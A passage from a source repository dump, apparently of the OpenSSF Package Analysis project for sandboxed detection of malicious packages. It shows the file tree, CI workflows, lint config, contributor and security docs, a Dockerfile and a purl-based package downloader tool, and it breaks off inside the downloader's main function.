├── .dockerignore ├── .github ├── dependabot.yml └── workflows │ ├── build-images.yml │ ├── build.yml │ ├── codeql-analysis.yml │ ├── depsreview.yml │ ├── osv-scanner-pr.yml │ ├── osv-scanner-scheduled.yml │ ├── scorecards-analysis.yml │ ├── shellcheck.yml │ └── test.yml ├── .gitignore ├── .golangci.yml ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── Makefile ├── README.md ├── SECURITY.md ├── cmd ├── analyze │ ├── Dockerfile │ └── main.go ├── downloader │ ├── README.md │ └── main.go ├── scheduler │ ├── Dockerfile │ ├── README.md │ ├── config │ │ └── deployment.yaml │ ├── main.go │ └── proxy │ │ └── proxy.go └── worker │ ├── config.go │ ├── main.go │ └── pubsubextender │ ├── extender.go │ ├── extender_test.go │ ├── gcpdriver.go │ ├── gcpdriver_test.go │ └── noopdriver.go ├── configs └── e2e │ ├── .gitignore │ ├── config │ └── feeds.yml │ └── docker-compose.yml ├── docs ├── case_studies.md ├── data_schema.md ├── images │ ├── Pipeline diagram.png │ ├── npm_depconf-typosquat_1.png │ ├── npm_random_vouchercode-generator_1.png │ ├── npm_random_vouchercode-generator_2.png │ ├── npm_roku_web_core-ajax_1.png │ ├── pypi_discordcmd_1.png │ ├── pypi_discordcmd_2.png │ └── pypi_secrevthree_1.png └── queries.md ├── examples ├── README.md ├── custom-sandbox │ ├── Dockerfile │ ├── Makefile │ ├── README.md │ └── analyze.php └── e2e │ └── README.md ├── function └── loader │ ├── README.md │ ├── dynamic-analysis-schema.json │ ├── go.mod │ ├── go.sum │ ├── load.go │ └── static-analysis-schema.json ├── go.mod ├── go.sum ├── infra ├── README.md ├── cloudbuild │ ├── dynamic_loader │ │ └── cloudbuild.yaml │ └── image_build │ │ └── cloudbuild.yaml ├── terraform │ ├── analysis.tf │ ├── build │ │ ├── main.tf │ │ └── variables.tf │ ├── docker_registry │ │ ├── main.tf │ │ └── variables.tf │ ├── metrics │ │ ├── log_metrics.tf │ │ └── variables.tf │ ├── terraform.tfvars │ └── variables.tf └── worker │ ├── scaler.yaml │ └── workers-set.yaml ├── internal ├── analysis │ ├── mode.go │ └── status.go ├── dnsanalyzer │ └── dnsanalyzer.go ├── dynamicanalysis │ ├── analysis.go │ └── sandbox_args.go ├── featureflags │ ├── featureflags.go │ ├── featureflags_test.go │ └── features.go ├── log │ ├── context.go │ ├── context_test.go │ ├── log.go │ ├── log_test.go │ ├── writer.go │ └── writer_test.go ├── notification │ └── notification.go ├── packetcapture │ └── packetcapture.go ├── pkgmanager │ ├── crates.io.go │ ├── download.go │ ├── download_test.go │ ├── ecosystem.go │ ├── npm.go │ ├── package.go │ ├── packagist.go │ ├── pypi.go │ └── rubygems.go ├── resultstore │ ├── result.go │ ├── resultstore.go │ └── resultstore_test.go ├── sandbox │ ├── copy_args.go │ ├── copy_args_test.go │ ├── init.go │ └── sandbox.go ├── staticanalysis │ ├── analyze.go │ ├── analyze_test.go │ ├── basicdata │ │ ├── basic_data.go │ │ ├── basic_data_test.go │ │ └── describe_files.go │ ├── externalcmd │ │ ├── input_strategy.go │ │ └── input_strategy_test.go │ ├── linelengths │ │ ├── line_lengths.go │ │ └── line_lengths_test.go │ ├── parsing │ │ ├── analyze.go │ │ ├── analyze_test.go │ │ ├── babel-parser.js │ │ ├── init_parser.go │ │ ├── js_parsing.go │ │ ├── js_parsing_test.go │ │ ├── package-lock.json │ │ ├── package.json │ │ ├── parsing_types.go │ │ ├── result.go │ │ └── string_regexp.go │ ├── result.go │ ├── result_test.go │ ├── signals │ │ ├── analyze.go │ │ ├── detections │ │ │ ├── addresses.go │ │ │ ├── addresses_test.go │ │ │ ├── base64.go │ │ │ ├── base64_test.go │ │ │ ├── escape_sequences.go │ │ │ ├── escape_sequences_test.go │ │ │ ├── hex_strings.go │ │ │ ├── hex_strings_test.go │ │ │ └── suspicious_identifiers.go │ │ ├── file_signals.go │ │ ├── file_signals_test.go │ │ ├── stats │ │ │ ├── sample_statistics.go │ │ │ └── sample_statistics_test.go │ │ └── stringentropy │ │ │ ├── string_entropy.go │ │ │ └── string_entropy_test.go │ └── task.go ├── strace │ ├── strace.go │ └── strace_test.go ├── useragent │ ├── useragent.go │ └── useragent_test.go ├── utils │ ├── archive_extract.go │ ├── archive_extract_test.go │ ├── combine_regexp.go │ ├── combine_regexp_test.go │ ├── comma_separated_flags.go │ ├── equals.go │ ├── file_write_data_utils.go │ ├── hash_file.go │ ├── hash_file_test.go │ ├── last_bytes.go │ ├── last_bytes_test.go │ ├── remove_duplicates.go │ ├── transform.go │ └── write_file.go └── worker │ ├── code_execution.go │ ├── logging.go │ ├── resolvepackage.go │ ├── rundynamic.go │ ├── runstatic.go │ ├── sandbox_options.go │ ├── save_data.go │ └── savefilewriteresults.go ├── osv-scanner.toml ├── pkg ├── api │ ├── analysisrun │ │ ├── key.go │ │ ├── key_test.go │ │ ├── phase.go │ │ └── result.go │ ├── notification │ │ └── notification.go │ ├── pkgecosystem │ │ ├── ecosystem.go │ │ └── ecosystem_test.go │ └── staticanalysis │ │ ├── record.go │ │ ├── signals.go │ │ └── token │ │ ├── identifier_type.go │ │ ├── position.go │ │ └── tokens.go └── valuecounts │ ├── value_counts.go │ └── value_counts_test.go ├── sample_packages ├── Makefile ├── README.md └── sample_python_package │ ├── Dockerfile │ ├── pyproject.toml │ ├── setup.py │ └── src │ ├── __init__.py │ └── example.py ├── sandboxes ├── README.md ├── dynamicanalysis │ ├── Dockerfile │ ├── analyze-node.js │ ├── analyze-php.php │ ├── analyze-python.py │ ├── analyze-ruby.rb │ ├── analyze-rust.py │ ├── bowerrc │ └── pypi-packages.txt └── staticanalysis │ ├── Dockerfile │ └── staticanalyze.go ├── scripts ├── analyse-tarballs.sh ├── bq_load.sh ├── deploy.sh ├── format-static-analysis-json.py └── run_analysis.sh ├── test └── e2e │ ├── README.md │ └── docker-compose.test.yml └── tools ├── README.md ├── analysis ├── README.md ├── analysis_runner.py ├── backfill.sh ├── node.txt ├── python.txt └── rubygems.txt ├── gvisor ├── README.md └── runsc_compat.sh └── network ├── iptables.rules └── podman-analysis.conflist /.dockerignore: -------------------------------------------------------------------------------- 1 | # What to ignore while building Go based cmd container images. 2 | # This helps make the images build a lot faster. 3 | build 4 | infra 5 | examples 6 | function/loader/** 7 | sandboxes 8 | internal/staticanalysis/parsing/js/node_modules 9 | node_modules 10 | web 11 | 12 | # Docker builds the static analysis sandbox image in 13 | # the top-level project directory, so needs to copy 14 | # from this subdirectory during the build 15 | !sandboxes/staticanalysis 16 | 17 | # Don't ignore any go mod or sum files; go build needs them 18 | # Note: this rule won't work if the parent directory of a 19 | # go.mod or go.sum file is excluded 20 | !**/go.mod 21 | !**/go.sum 22 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: "gomod" 4 | directory: "/" 5 | schedule: 6 | interval: "monthly" 7 | open-pull-requests-limit: 10 8 | groups: 9 | gomod-minor-updates: 10 | update-types: 11 | - "minor" 12 | - "patch" 13 | - package-ecosystem: "gomod" 14 | directory: "/function/loader" 15 | schedule: 16 | interval: "monthly" 17 | open-pull-requests-limit: 10 18 | groups: 19 | loader-minor-updates: 20 | update-types: 21 | - "minor" 22 | - "patch" 23 | - package-ecosystem: "github-actions" 24 | directory: "/" 25 | schedule: 26 | interval: "monthly" 27 | groups: 28 | actions-minor-updates: 29 | update-types: 30 | - "minor" 31 | - "patch" 32 | - package-ecosystem: "npm" 33 | directory: "/internal/staticanalysis/parsing" 34 | schedule: 35 | interval: "monthly" 36 | groups: 37 | parsing-minor-updates: 38 | update-types: 39 | - "minor" 40 | - "patch" 41 | -------------------------------------------------------------------------------- /.github/workflows/build-images.yml: -------------------------------------------------------------------------------- 1 | name: "Build docker" 2 | 3 | on: 4 | pull_request: 5 | 6 | push: 7 | paths-ignore: 8 | - '**.md' 9 | 10 | permissions: read-all 11 | 12 | jobs: 13 | build_docker: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - name: Checkout 17 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 18 | 19 | - name: setup-go 20 | uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 21 | with: 22 | go-version-file: 'go.mod' 23 | 24 | - name: Enable docker experimental 25 | run: | 26 | echo $'{"experimental": true}' | sudo dd status=none of=/etc/docker/daemon.json 27 | sudo service docker restart 28 | docker version -f '{{.Server.Experimental}}' 29 | 30 | - name: build_docker 31 | run: make build 32 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: "Build" 2 | 3 | on: 4 | pull_request: 5 | 6 | permissions: read-all 7 | 8 | jobs: 9 | Build: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 13 | - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 14 | with: 15 | go-version-file: 'go.mod' 16 | - name: Install libpcap-dev 17 | run: sudo apt-get install -y libpcap-dev 18 | - run: go build -o scheduler ./cmd/scheduler 19 | - run: go build -o worker ./cmd/worker 20 | - run: go build -o analyze ./cmd/analyze 21 | - run: go build -o loader load.go 22 | working-directory: function/loader 23 | - run: go build -o staticanalyze staticanalyze.go 24 | working-directory: sandboxes/staticanalysis 25 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed 2 | name: "CodeQL" 3 | 4 | on: 5 | push: 6 | branches: [ main ] 7 | paths-ignore: 8 | - '**.md' 9 | pull_request: 10 | # The branches below must be a subset of the branches above 11 | branches: [ main ] 12 | paths-ignore: 13 | - '**.md' 14 | schedule: 15 | - cron: '22 19 * * 0' 16 | 17 | permissions: read-all 18 | 19 | jobs: 20 | analyze: 21 | name: Analyze 22 | runs-on: ubuntu-latest 23 | permissions: 24 | security-events: write 25 | actions: read 26 | contents: read 27 | 28 | strategy: 29 | fail-fast: false 30 | matrix: 31 | language: [ 'go' ] 32 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ] 33 | # Learn more: 34 | 35 | steps: 36 | - name: Checkout repository 37 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 38 | 39 | - name: setup-go 40 | uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 41 | with: 42 | go-version-file: 'go.mod' 43 | 44 | # Initializes the CodeQL tools for scanning. 45 | - name: Initialize CodeQL 46 | uses: github/codeql-action/init@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 47 | with: 48 | languages: ${{ matrix.language }} 49 | 50 | - name: Autobuild 51 | uses: github/codeql-action/autobuild@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 52 | 53 | - name: Perform CodeQL Analysis 54 | uses: github/codeql-action/analyze@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 55 | -------------------------------------------------------------------------------- /.github/workflows/depsreview.yml: -------------------------------------------------------------------------------- 1 | name: 'Dependency Review' 2 | 3 | on: 4 | pull_request: 5 | paths-ignore: 6 | - '**.md' 7 | 8 | permissions: 9 | contents: read 10 | 11 | jobs: 12 | dependency-review: 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: 'Checkout Repository' 16 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 17 | - name: 'Dependency Review' 18 | uses: actions/dependency-review-action@3b139cfc5fae8b618d3eae3675e383bb1769c019 # v4.5.0 19 | -------------------------------------------------------------------------------- /.github/workflows/osv-scanner-pr.yml: -------------------------------------------------------------------------------- 1 | name: OSV-Scanner PR Scan 2 | 3 | # Change "main" to your default branch if you use a different name, i.e. "master" 4 | on: 5 | pull_request: 6 | branches: [ main ] 7 | merge_group: 8 | branches: [ main ] 9 | 10 | # Declare default permissions as read only. 11 | permissions: 12 | actions: read 13 | contents: read 14 | # Require writing security events to upload SARIF file to security tab 15 | security-events: write 16 | 17 | jobs: 18 | scan-pr: 19 | uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v1.9.2" 20 | -------------------------------------------------------------------------------- /.github/workflows/osv-scanner-scheduled.yml: -------------------------------------------------------------------------------- 1 | name: OSV-Scanner Scheduled Scan 2 | 3 | on: 4 | schedule: 5 | - cron: '50 1 * * 6' # run at 01:50 UTC every Saturday 6 | # Change "main" to your default branch if you use a different name, i.e. "master" 7 | push: 8 | branches: [ main ] 9 | 10 | permissions: 11 | actions: read 12 | contents: read 13 | # Require writing security events to upload SARIF file to security tab 14 | security-events: write 15 | 16 | jobs: 17 | scan-scheduled: 18 | uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v1.9.2" 19 | -------------------------------------------------------------------------------- /.github/workflows/scorecards-analysis.yml: -------------------------------------------------------------------------------- 1 | name: Scorecards supply-chain security 2 | on: 3 | # Only the default branch is supported. 4 | branch_protection_rule: 5 | schedule: 6 | - cron: '21 11 * * 0' 7 | push: 8 | branches: [ main ] 9 | paths-ignore: 10 | - '**.md' 11 | 12 | # Declare default permissions as read only. 13 | permissions: read-all 14 | 15 | jobs: 16 | analysis: 17 | name: Scorecards analysis 18 | runs-on: ubuntu-latest 19 | permissions: 20 | # Needed to upload the results to code-scanning dashboard. 21 | security-events: write 22 | actions: read 23 | contents: read 24 | id-token: write 25 | 26 | steps: 27 | - name: "Checkout code" 28 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 29 | with: 30 | persist-credentials: false 31 | 32 | - name: "Run analysis" 33 | uses: ossf/scorecard-action@62b2cac7ed8198b15735ed49ab1e5cf35480ba46 # v2.4.0 34 | with: 35 | results_file: results.sarif 36 | results_format: sarif 37 | repo_token: ${{ secrets.GITHUB_TOKEN }} 38 | # Publish the results for public repositories to enable scorecard badges. For more details, see 39 | # https://github.com/ossf/scorecard-action#publishing-results. 40 | # For private repositories, `publish_results` will automatically be set to `false`, regardless 41 | # of the value entered here. 42 | publish_results: true 43 | 44 | # Upload the results as artifacts (optional). 45 | - name: "Upload artifact" 46 | uses: actions/upload-artifact@65c4c4a1ddee5b72f698fdd19549f0f0fb45cf08 # v4.6.0 47 | with: 48 | name: SARIF file 49 | path: results.sarif 50 | retention-days: 5 51 | 52 | # Upload the results to GitHub's code scanning dashboard. 53 | - name: "Upload to code-scanning" 54 | uses: github/codeql-action/upload-sarif@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 55 | with: 56 | sarif_file: results.sarif 57 | -------------------------------------------------------------------------------- /.github/workflows/shellcheck.yml: -------------------------------------------------------------------------------- 1 | 2 | name: 'Shellcheck' 3 | 4 | on: 5 | push: 6 | paths: 7 | - '**.sh' 8 | 9 | pull_request: 10 | paths: 11 | - '**.sh' 12 | 13 | permissions: 14 | contents: read 15 | 16 | jobs: 17 | check-scripts: 18 | runs-on: ubuntu-latest 19 | steps: 20 | - name: 'Checkout Repository' 21 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 22 | - name: 'Check scripts in all directories' 23 | run: make check_scripts 24 | -------------------------------------------------------------------------------- /.github/workflows/test.yml: -------------------------------------------------------------------------------- 1 | name: "Test" 2 | 3 | on: 4 | pull_request: 5 | paths-ignore: 6 | - '**.md' 7 | 8 | permissions: read-all 9 | 10 | jobs: 11 | run-tests: 12 | runs-on: ubuntu-latest 13 | steps: 14 | - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 15 | - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 16 | with: 17 | go-version-file: 'go.mod' 18 | - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af # v4.1.0 19 | with: 20 | node-version: 18 21 | - name: Install libpcap-dev 22 | run: sudo apt-get install -y libpcap-dev 23 | - name: Run tests 24 | run: go test -v -skip "TestDownload/crates.io_rand_valid_version" ./... 25 | run-linter: 26 | runs-on: ubuntu-latest 27 | steps: 28 | - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 29 | - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 30 | with: 31 | go-version-file: 'go.mod' 32 | - name: golangci-lint 33 | uses: golangci/golangci-lint-action@971e284b6050e8a5849b72094c50ab08da042db8 # v6.1.1 34 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | .terraform* 18 | *.tfstate 19 | 20 | # node_modules folders containing JS dependencies 21 | # these should be pre-installed where needed 22 | node_modules/ 23 | 24 | -------------------------------------------------------------------------------- /.golangci.yml: -------------------------------------------------------------------------------- 1 | --- 2 | run: 3 | concurrency: 6 4 | timeout: 5m 5 | issues: 6 | # Maximum issues count per one linter. 7 | # Set to 0 to disable. 8 | # Default: 50 9 | max-issues-per-linter: 0 10 | # Maximum count of issues with the same text. 11 | # Set to 0 to disable. 12 | # Default: 3 13 | max-same-issues: 0 14 | # Exclude previously existing issues from the report 15 | new: true 16 | new-from-rev: HEAD 17 | linters: 18 | disable-all: true 19 | enable: 20 | - asciicheck 21 | - bodyclose 22 | - copyloopvar 23 | - depguard 24 | - dogsled 25 | - errcheck 26 | - errorlint 27 | - exhaustive 28 | - gci 29 | #- gochecknoinits 30 | - gocognit 31 | - goconst 32 | - gocritic 33 | - gocyclo 34 | - godot 35 | - godox 36 | #- goerr113 37 | - gofmt 38 | - gofumpt 39 | - goheader 40 | - goimports 41 | - gomodguard 42 | - goprintffuncname 43 | - gosec 44 | - gosimple 45 | #- govet 46 | - ineffassign 47 | #- lll 48 | - makezero 49 | - misspell 50 | - nakedret 51 | - nestif 52 | - noctx 53 | - nolintlint 54 | #- paralleltest 55 | - predeclared 56 | - staticcheck 57 | - stylecheck 58 | - thelper 59 | - tparallel 60 | - typecheck 61 | - unconvert 62 | - unparam 63 | - unused 64 | - whitespace 65 | - wrapcheck 66 | linters-settings: 67 | errcheck: 68 | check-type-assertions: true 69 | check-blank: true 70 | exhaustive: 71 | # https://golangci-lint.run/usage/linters/#exhaustive 72 | default-signifies-exhaustive: true 73 | govet: 74 | enable: 75 | - fieldalignment 76 | godox: 77 | keywords: 78 | - BUG 79 | - FIXME 80 | - HACK 81 | gci: 82 | sections: 83 | - standard 84 | - default 85 | - prefix(github.com/ossf/package-analysis) 86 | gocritic: 87 | enabled-checks: 88 | # Diagnostic 89 | - appendAssign 90 | - badCond 91 | - caseOrder 92 | - codegenComment 93 | - commentedOutCode 94 | - deprecatedComment 95 | - dupBranchBody 96 | - dupCase 97 | - dupSubExpr 98 | - exitAfterDefer 99 | - flagName 100 | - nilValReturn 101 | - weakCond 102 | - octalLiteral 103 | 104 | # Performance 105 | - appendCombine 106 | #- hugeParam 107 | - rangeExprCopy 108 | - rangeValCopy 109 | 110 | # Style 111 | - boolExprSimplify 112 | - captLocal 113 | - commentFormatting 114 | - commentedOutImport 115 | - defaultCaseOrder 116 | - docStub 117 | - elseif 118 | - emptyFallthrough 119 | - hexLiteral 120 | - ifElseChain 121 | - methodExprCall 122 | - singleCaseSwitch 123 | - typeAssertChain 124 | - typeSwitchVar 125 | - underef 126 | - unlabelStmt 127 | - unlambda 128 | 129 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to Package Analysis 2 | 3 | Hello new contributor! Thank you for contributing your time and expertise to the Package Analysis project. 4 | We're delighted to have you on board. 5 | 6 | This document describes the contribution guidelines for the project. 7 | 8 | ## Ways to get in touch 9 | 10 | If you have any contribution-related questions, please get in touch! Here are some ways to reach current contributors 11 | 1. Open a new issue (strongly preferred) 12 | 1. Via the [OpenSSF Securing Critical Projects Working Group](https://github.com/ossf/wg-securing-critical-projects) mailing list or Slack channel 13 | 14 | Note: for minor changes (typos, documentation improvements), feel free to open a pull request directly. 15 | 16 | **Note:** Before you start contributing, you must read and abide by our 17 | **[Code of Conduct](./CODE_OF_CONDUCT.md)**. 18 | 19 | ## Contributing code 20 | 21 | ### Getting started 22 | 23 | 1. Create [a GitHub account](https://github.com/join) 24 | 1. Set up your [development environment](#environment-setup) 25 | 26 | ## Environment Setup 27 | 28 | You must install these tools: 29 | 30 | 1. [`git`](https://help.github.com/articles/set-up-git/): For source control. 31 | 1. [`go`](https://go.dev/dl/): For running code. 32 | 1. `make`: For running development commands 33 | 34 | For running/testing locally, the following additional tools are required: 35 | 36 | 1. [`docker`](https://www.docker.com/get-started/): The external container 37 | 1. [`podman`](https://podman.io/getting-started/): The internal container 38 | 1. [`docker-compose`](https://docs.docker.com/compose/install/) for end-to-end testing 39 | 40 | Then clone the repository, e.g: 41 | 42 | ```shell 43 | $ git clone git@github.com:ossf/package-analysis.git 44 | $ cd package-analysis 45 | ``` 46 | 47 | ## Notes on style 48 | 49 | ### Commit style 50 | 51 | Prefer smaller PRs to make reviewing easier. Larger changes can be split into smaller PRs by branching off previous (unmerged) branches rather than main. 52 | 53 | ### Code style 54 | 55 | We generally follow the [Google Go Style Guide](https://google.github.io/styleguide/go/index). 56 | 57 | #### Warnings 58 | 59 | Some things that are OK: 60 | 61 | - not handling the error when `defer` close() on an HTTP response body 62 | 63 | #### Comments 64 | 65 | Follow official Go comment style: https://tip.golang.org/doc/comment. 66 | In particular, all exported (capitalised) types and functions should have a comment explaining what they do. 67 | The comment should start with the type/function name. 68 | 69 | #### Imports 70 | 71 | - stdlib imports grouped first, then 3rd party packages, then local imports 72 | - each group separated by a blank line and ordered alphabetically 73 | 74 | ##### on IntelliJ 75 | 76 | - Remove redundant import aliases: yes 77 | - Sorting type: gofmt 78 | - Move all imports into a single declaration: yes 79 | - Group stdlib imports: yes 80 | - Move all stdlib imports in a single group: yes 81 | - Group: yes, current project packages 82 | 83 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Reporting Security Issues 2 | 3 | To report a security issue, please email 4 | [oss-security@googlegroups.com](mailto:oss-security@googlegroups.com) 5 | with a description of the issue, the steps you took to create the issue, 6 | affected versions, and, if known, mitigations for the issue. 7 | 8 | Our vulnerability management team will respond within 3 working days of your 9 | email. If the issue is confirmed as a vulnerability, we will open a 10 | Security Advisory and acknowledge your contributions as part of it. This project 11 | follows a 90 day disclosure timeline. 12 | 13 | Additionally, vulnerabilities can be reported to repository maintainers 14 | [here on Github](https://github.com/ossf/package-analysis/security/advisories/new). 15 | -------------------------------------------------------------------------------- /cmd/analyze/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build 2 | RUN apt-get update && apt-get install -y libpcap-dev 3 | WORKDIR /src 4 | 5 | # First cache the dependencies to avoid downloading again on code change 6 | COPY ./go.mod ./ 7 | COPY ./go.sum ./ 8 | RUN go mod download 9 | 10 | COPY . ./ 11 | RUN go build -o analyze ./cmd/analyze && go build -o worker ./cmd/worker 12 | 13 | FROM ubuntu:22.04@sha256:42ba2dfce475de1113d55602d40af18415897167d47c2045ec7b6d9746ff148f 14 | 15 | ENV DEBIAN_FRONTEND noninteractive 16 | RUN apt-get update && apt-get upgrade -y && \ 17 | apt-get install -y \ 18 | apt-transport-https \ 19 | ca-certificates \ 20 | curl \ 21 | iptables \ 22 | iproute2 \ 23 | podman \ 24 | software-properties-common && \ 25 | update-alternatives --set iptables /usr/sbin/iptables-legacy && \ 26 | update-alternatives --set ip6tables /usr/sbin/ip6tables-legacy 27 | 28 | # Install gVisor. 29 | RUN mkdir -m 0700 -p /etc/apt/keyrings && \ 30 | curl -fsSL https://gvisor.dev/archive.key -o /etc/apt/keyrings/gvisor.key && \ 31 | echo "deb [signed-by=/etc/apt/keyrings/gvisor.key] https://storage.googleapis.com/gvisor/releases 20240212 main" > /etc/apt/sources.list.d/gvisor.list && \ 32 | apt-get update && apt-get install -y runsc 33 | 34 | COPY --from=build /src/analyze /usr/local/bin/analyze 35 | COPY --from=build /src/worker /usr/local/bin/worker 36 | COPY --from=build /src/tools/gvisor/runsc_compat.sh /usr/local/bin/runsc_compat.sh 37 | COPY --from=build /src/tools/network/iptables.rules /usr/local/etc/iptables.rules 38 | COPY --from=build /src/tools/network/podman-analysis.conflist /etc/cni/net.d/podman-analysis.conflist 39 | RUN chmod 755 /usr/local/bin/runsc_compat.sh && \ 40 | chmod 644 /usr/local/etc/iptables.rules /etc/cni/net.d/podman-analysis.conflist 41 | 42 | ARG SANDBOX_IMAGE_TAG 43 | ENV OSSF_SANDBOX_IMAGE_TAG=${SANDBOX_IMAGE_TAG} 44 | -------------------------------------------------------------------------------- /cmd/downloader/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Package Download tool 3 | 4 | This tool enables easy batch download of many packages to a local directory, 5 | which may be useful for testing or running analysis locally. 6 | 7 | ## Building 8 | 9 | ```bash 10 | go build -o downloader main.go 11 | ``` 12 | 13 | ## Running 14 | 15 | ```bash 16 | ./downloader -f -d 17 | ``` 18 | 19 | There are two options to the downloader tool: 20 | 21 | 1. List of packages to download (mandatory) 22 | 2. Destination directory to download to (optional) 23 | 24 | If `-d` is not specified, packages will be downloaded to the current directory. 25 | 26 | The file containing the list of packages to download must have the following structure: 27 | 28 | 1. Each line of the file specifies one package to download in 29 | [Package URL](https://github.com/package-url/purl-spec) format 30 | 2. Package ecosystem and name are required, version is optional 31 | 3. If the version is not given, the latest version is downloaded 32 | 33 | Here are some examples of Package URLs (purls): 34 | 35 | - `pkg:npm/async`: NPM package `async`, no version specified 36 | - `pkg:pypi/requests@2.31.0`: PyPI package `requests`, version 2.31.0 37 | - `pkg:npm/%40babel/runtime`: NPM package `@babel/runtime` (note: percent encoding is not required by this tool) 38 | 39 | If Package URL is invalid or a package fails to download, the error will be printed but will not stop the program; 40 | remaining package downloads will still be attempted. -------------------------------------------------------------------------------- /cmd/downloader/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "errors" 6 | "flag" 7 | "fmt" 8 | "net/http" 9 | "os" 10 | "strings" 11 | 12 | "github.com/package-url/packageurl-go" 13 | 14 | "github.com/ossf/package-analysis/internal/useragent" 15 | "github.com/ossf/package-analysis/internal/worker" 16 | ) 17 | 18 | // Command-line tool to download a list of package archives, specified by purl 19 | // See https://github.com/package-url/purl-spec 20 | var ( 21 | purlFilePath = flag.String("f", "", "file containing list of package URLs") 22 | downloadDir = flag.String("d", "", "directory to store downloaded tarballs") 23 | ) 24 | 25 | // cmdError is a simple string error type, used when command usage 26 | // should be printed alongside the actual error message 27 | type cmdError struct { 28 | message string 29 | } 30 | 31 | func (c *cmdError) Error() string { 32 | return c.message 33 | } 34 | 35 | func newCmdError(message string) error { 36 | return &cmdError{message} 37 | } 38 | 39 | func downloadPackage(purl packageurl.PackageURL, dir string) error { 40 | pkg, err := worker.ResolvePurl(purl) 41 | if err != nil { 42 | return err 43 | } 44 | 45 | fmt.Printf("[%s] %s@%s", pkg.EcosystemName(), pkg.Name(), pkg.Version()) 46 | 47 | if downloadPath, err := pkg.Manager().DownloadArchive(pkg.Name(), pkg.Version(), dir); err != nil { 48 | fmt.Println() 49 | return err 50 | } else { 51 | fmt.Printf(" -> %s\n", downloadPath) 52 | } 53 | 54 | return nil 55 | } 56 | 57 | func checkDirectoryExists(path string) error { 58 | stat, err := os.Stat(path) 59 | 60 | if err != nil && errors.Is(err, os.ErrNotExist) { 61 | return fmt.Errorf("path %s does not exist", path) 62 | } 63 | if err != nil { 64 | return fmt.Errorf("could not stat %s: %w", path, err) 65 | } 66 | if !stat.IsDir() { 67 | return fmt.Errorf("%s is not a directory", path) 68 | } 69 | 70 | return nil 71 | } 72 | 73 | func processFileLine(text string) error { 74 | trimmed := strings.TrimSpace(text) 75 | if len(trimmed) == 0 || trimmed[0] == '#' { 76 | return nil 77 | } 78 | 79 | if purl, err := packageurl.FromString(trimmed); err != nil { 80 | return fmt.Errorf("invalid purl '%s': %w", text, err) 81 | } else if err := downloadPackage(purl, *downloadDir); err != nil { 82 | return fmt.Errorf("could not download %s: %w", text, err) 83 | } 84 | 85 | return nil 86 | } 87 | 88 | func run() error { 89 | flag.Parse() 90 | 91 | http.DefaultTransport = useragent.DefaultRoundTripper(http.DefaultTransport, "") 92 | 93 | if *purlFilePath == "" { 94 | return newCmdError("Please specify packages to download using -f ") 95 | } 96 | if *downloadDir == "" { 97 | *downloadDir = "." 98 | } 99 | 100 | if err := checkDirectoryExists(*downloadDir); err != nil { 101 | return err 102 | } 103 | 104 | purlFile, err := os.Open(*purlFilePath) 105 | if err != nil { 106 | return err 107 | } 108 | 109 | defer purlFile.Close() 110 | 111 | scanner := bufio.NewScanner(purlFile) 112 | for line := 1; scanner.Scan(); line += 1 { 113 | if err := processFileLine(scanner.Text()); err != nil { 114 | fmt.Fprintf(os.Stderr, "line %d: %v\n", line, err) 115 | } 116 | } 117 | 118 | return nil 119 | } 120 | 121 | func main() { 122 | if err := run(); err != nil { 123 | var cmdErr *cmdError 124 | if errors.As(err, &cmdErr) { 125 | flag.Usage() 126 | 